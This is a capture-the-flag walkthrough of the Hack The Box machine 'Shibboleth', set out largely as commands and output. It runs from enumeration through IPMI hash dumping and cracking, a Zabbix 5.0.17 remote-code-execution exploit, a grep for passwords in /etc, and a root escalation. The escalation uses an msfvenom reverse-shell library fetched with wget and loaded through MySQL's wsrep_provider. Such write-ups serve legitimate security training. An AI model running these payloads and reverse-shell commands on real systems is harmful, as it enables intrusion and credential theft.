/etc/hosts
10.10.11.124 shibboleth.htb
nmap
nmap -sV shibboleth.htb
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41
We only have an apache server.
gobuster
gobuster dir -t 100 -u http://shibboleth.htb/ -w ~/Documents/wordlist/directory-list-medium.txt
/assets (Status: 301) [Size: 317] [--> http://shibboleth.htb/assets/]
/forms (Status: 301) [Size: 316] [--> http://shibboleth.htb/forms/]
/server-status (Status: 403) [Size: 279]
http://shibboleth.htb/forms/
In the Readme.txt we have this:
Fully working PHP/AJAX contact form script is available in the pro version of the template.
You can buy it from: https://bootstrapmade.com/flexstart-bootstrap-startup-template/
In the contact.php we have this:
Unable to load the "PHP Email Form" Library!
Subdomain listing
wfuzz -c -f sub-fighter -w Documents/wordlist/subdomains-top1million-5000.txt -u http://shibboleth.htb/ -H "Host: FUZZ.shibboleth.htb" --hw 26
The –hw mean I will exclude every resultats with word 26.
We also have an hint in main page.
gobuster
gobuster dir -t 100 -u http://zabbix.shibboleth.htb -w ~/Documents/wordlist/directory-list-medium.txt -k
/modules (Status: 301) [Size: 332] [--> http://zabbix.shibboleth.htb/modules/]
/assets (Status: 301) [Size: 331] [--> http://zabbix.shibboleth.htb/assets/]
/audio (Status: 301) [Size: 330] [--> http://zabbix.shibboleth.htb/audio/]
/local (Status: 301) [Size: 330] [--> http://zabbix.shibboleth.htb/local/]
/app (Status: 301) [Size: 328] [--> http://zabbix.shibboleth.htb/app/]
/js (Status: 301) [Size: 327] [--> http://zabbix.shibboleth.htb/js/]
/include (Status: 301) [Size: 332] [--> http://zabbix.shibboleth.htb/include/]
/conf (Status: 301) [Size: 329] [--> http://zabbix.shibboleth.htb/conf/]
/vendor (Status: 301) [Size: 331] [--> http://zabbix.shibboleth.htb/vendor/]
/fonts (Status: 301) [Size: 330] [--> http://zabbix.shibboleth.htb/fonts/]
/locale (Status: 301) [Size: 331] [--> http://zabbix.shibboleth.htb/locale/]
/server-status (Status: 403) [Size: 286]
It’s forbiden everywhere.
I found nothing and all the new exploits of zabbix don’t work.
I have to continue the enumeration.
nmap UDP
sudo nmap -sU nmap -sU --min-rate 5000 shibboleth.htb
PORT STATE SERVICE
518/udp closed ntalk
623/udp open asf-rmcp
16919/udp closed unknown
16972/udp closed unknown
30975/udp closed unknown
42431/udp closed unknown
44253/udp closed unknown
The port 623 is open.
Exploit IPMI (port 623)
msfconsole
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS 10.10.11.124
run
...
[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:5479a2ba820600003ad3a123b77e26a23ce881756019b75dec504d50007565022cf0fcdb1f86674ba123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:2d636e7b85ec1c5ab81526480df9ff2e614f4379
Crack the hash
I store the hash in the hash
file.
I’m gonna use hashcat to crack it.
hashcat -h |grep IPMI
Output
7300 | IPMI2 RAKP HMAC-SHA1 | Network Protocol
So the command gonna be this one.
hashcat -m 7300 -a 0 hash /home/peanutstick/Documents/wordlist/rockyou.txt
I have a password.
Zabbix
As we can see it’s Zabbix 5.0.17.
I’m gonna use this exploit.
https://packetstormsecurity.com/files/166256/Zabbix-5.0.17-Remote-Code-Execution.html
python3 exploit.py http://zabbix.shibboleth.htb Administrator Thepassword 10.10.14.147 4648
I’m in.
Privilege escalation
ls /home
Output
ipmi-svc
So we have to connect with this user and the password we found in the hash.
su ipmi-svc
Enum with shell
I have to upgrade the shell first.
python3 -c 'import pty; pty.spawn("/bin/bash")'
Now let’s se if there is come creds in clear text.
grep --color=auto -rnw '/etc' -ie "Password" --color=always 2> /dev/null
Exploit mysql
Create the payload
You have to use an another port.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.147 LPORT=4649 -f elf-so -o exp.so
python2.7 -m SimpleHTTPServer
Listen with netcat.
nc -nlvp 4649
Upload the payload
On the server
mkdir /tmp/exp
cd /tmp/exp
wget http://10.10.14.147:8000/exp.so
Execute the payload
mysql -u zabbix -p
with mysql.
SET GLOBAL wsrep_provider="/tmp/exp/exp.so";
I’m root.